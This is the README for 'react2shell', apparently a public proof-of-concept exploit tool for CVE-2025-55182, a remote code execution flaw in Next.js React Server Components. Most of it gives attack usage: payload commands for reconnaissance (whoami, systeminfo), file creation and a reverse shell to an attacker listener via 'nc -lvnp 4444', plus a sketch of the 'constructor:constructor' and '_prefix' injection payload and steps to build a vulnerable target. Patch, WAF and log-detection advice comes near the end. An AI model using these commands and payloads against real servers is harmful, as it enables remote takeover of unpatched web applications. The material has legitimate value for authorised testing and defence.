## https://sploitus.com/exploit?id=A8C4941D-890F-5192-A5F7-E2865FFD7000
# React2Shell - CVE-2025-55182 Exploit PoC



A proof-of-concept exploit for CVE-2025-55182, a critical Remote Code Execution vulnerability in Next.js applications using React Server Components.
## โ ๏ธ DISCLAIMER
**THIS TOOL IS FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY.**
- โ DO NOT use against systems you don't own or have explicit permission to test
- โ Unauthorized access to computer systems is illegal
- โ Only use in controlled environments for learning and authorized penetration testing
- โ The author is not responsible for misuse or damage caused by this tool
## ๐ Vulnerability Details
- **CVE ID**: CVE-2025-55182
- **Vulnerability**: Remote Code Execution in React Server Components
- **Affected Versions**:
- Next.js: โฅ14.3.0-canary.77, all 15.x and 16.x versions with App Router
- React: 19.0, 19.1.0, 19.1.1, 19.2.0
- **Patched Versions**:
- Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
- React: 19.0.1, 19.1.2, 19.2.1
- **CVSS Score**: Critical
- **Attack Vector**: Network-based, requires crafted POST request
## ๐ฏ Features
- โ Cross-platform support (Windows & Linux)
- โ Multiple payload types
- โ Reverse shell capabilities
- โ Visual proof payloads (calc, notepad)
- โ File system operations
- โ System information gathering
## ๐ง Installation
```bash
# Clone or download this repository
git clone https://github.com/zr0n/react2shell
cd react2shell
# Install dependencies
npm install form-data
```
## ๐ป Usage
### Basic Syntax
```bash
node react2shell.js [options]
```
### Available Payloads
| Payload | Description | Example |
|---------|-------------|---------|
| `basic` | Mathematical proof of concept (7*7+1=50) | `node react2shell.js http://target:3000 basic` |
| `whoami` | Display current system user | `node react2shell.js http://target:3000 whoami` |
| `dir` | List current directory contents | `node react2shell.js http://target:3000 dir` |
| `systeminfo` | Display operating system information | `node react2shell.js http://target:3000 systeminfo` |
| `file` | Create EXPLOITED.txt proof file | `node react2shell.js http://target:3000 file` |
| `calc` | Launch calculator (Windows visual proof) | `node react2shell.js http://target:3000 calc` |
| `notepad` | Launch notepad (Windows visual proof) | `node react2shell.js http://target:3000 notepad` |
| `shell` | Reverse shell (Windows/Linux auto-detect) | `node react2shell.js http://target:3000 shell 10.10.10.5 4444` |
### Examples
#### 1. Basic Proof of Concept
```bash
node react2shell.js http://localhost:3000 basic
# Check server console for output: EXPLOITED: 50
```
#### 2. System Reconnaissance
```bash
# Get current user
node react2shell.js http://localhost:3000 whoami
# List files
node react2shell.js http://localhost:3000 dir
# System information
node react2shell.js http://localhost:3000 systeminfo
```
#### 3. Visual Proof (Windows)
```bash
# Launch calculator
node react2shell.js http://localhost:3000 calc
# Launch notepad
node react2shell.js http://localhost:3000 notepad
```
#### 4. File Creation Proof
```bash
node react2shell.js http://localhost:3000 file
# Check server directory for EXPLOITED.txt
```
#### 5. Reverse Shell
```bash
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Execute exploit
node react2shell.js http://localhost:3000 shell 4444
# Works on both Windows (PowerShell) and Linux (Bash)
```
## ๐๏ธ Setting Up Vulnerable Environment
### Prerequisites
- Node.js 18+
- npm or yarn
### Create Vulnerable Next.js Application
```bash
# Create project directory
mkdir vulnerable-nextjs-app
cd vulnerable-nextjs-app
# Initialize Next.js with vulnerable version
npx create-next-app@latest . --ts --app --no-eslint --tailwind
# Downgrade to vulnerable version
npm install next@15.0.4
# Install dependencies
npm install
```
### Minimal Vulnerable App (`app/page.tsx`)
```typescript
export default function Home() {
return (
Vulnerable Next.js App
This app is vulnerable to CVE-2025-55182
);
}
```
### Start Server
```bash
npm run dev
# Server runs on http://localhost:3000
```
## ๐ How It Works
The exploit leverages a deserialization vulnerability in React Server Components:
1. **Payload Construction**: Creates a malicious serialized object with prototype pollution
2. **Function Constructor Access**: Exploits `constructor.constructor` to access the Function constructor
3. **Code Injection**: Injects arbitrary JavaScript code through the `_prefix` field
4. **Execution**: Server deserializes the payload and executes the injected code
### Technical Details
```javascript
// Simplified vulnerability chain
{
_formData: {
get: '$3:constructor:constructor' // Access Function constructor
},
_prefix: 'YOUR_CODE_HERE//' // Injected code
}
```
## ๐ก๏ธ Mitigation
### For Application Owners
1. **Update Immediately**:
```bash
npm update next@latest
npm update react@latest react-dom@latest
```
2. **Verify Patched Versions**:
```bash
npm list next react
```
3. **Required Versions**:
- Next.js: โฅ16.0.7 or โฅ15.5.7
- React: โฅ19.2.1 or โฅ19.1.2
### For Security Teams
- Scan for vulnerable Next.js versions in your infrastructure
- Implement Web Application Firewall (WAF) rules to detect malicious RSC payloads
- Monitor for suspicious POST requests with `next-action` headers
- Review server-side logs for unexpected code execution patterns
## ๐ Detection
### WAF Rules
Look for POST requests with:
- Header: `next-action`
- Content-Type: `multipart/form-data`
- Body containing: `constructor`, `_prefix`, `_formData`
### Log Patterns
```
POST / with next-action header
Suspicious FormData keys: 0, 1, 2, 3, 4
Response: 200 (successful exploitation) or 500 (failed)
```
## ๐ References
- [CVE-2025-55182 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Next.js Security Advisories](https://github.com/vercel/next.js/security)
- [React Security Updates](https://react.dev/blog)
- [OWASP Code Injection](https://owasp.org/www-community/attacks/Code_Injection)
## ๐ค Contributing
This is an educational tool. Contributions that improve:
- Detection capabilities
- Documentation
- Defensive strategies
- Educational content
are welcome. DO NOT submit contributions that enhance attack capabilities.
## ๐ License
Educational Use Only - No warranty provided
## ๐ค Author
[Luiz Fernando Ziron](https://instagram.com/luizfernandoziron)
Created for cybersecurity education and awareness purposes.
## โ๏ธ Legal Notice
By using this tool, you agree to:
- Only use it on systems you own or have explicit written permission to test
- Take full responsibility for your actions
- Not hold the author liable for any misuse or damage
- Comply with all applicable laws and regulations
**Unauthorized access to computer systems is a crime in most jurisdictions.**
---
**Stay safe, stay ethical, stay legal. ๐**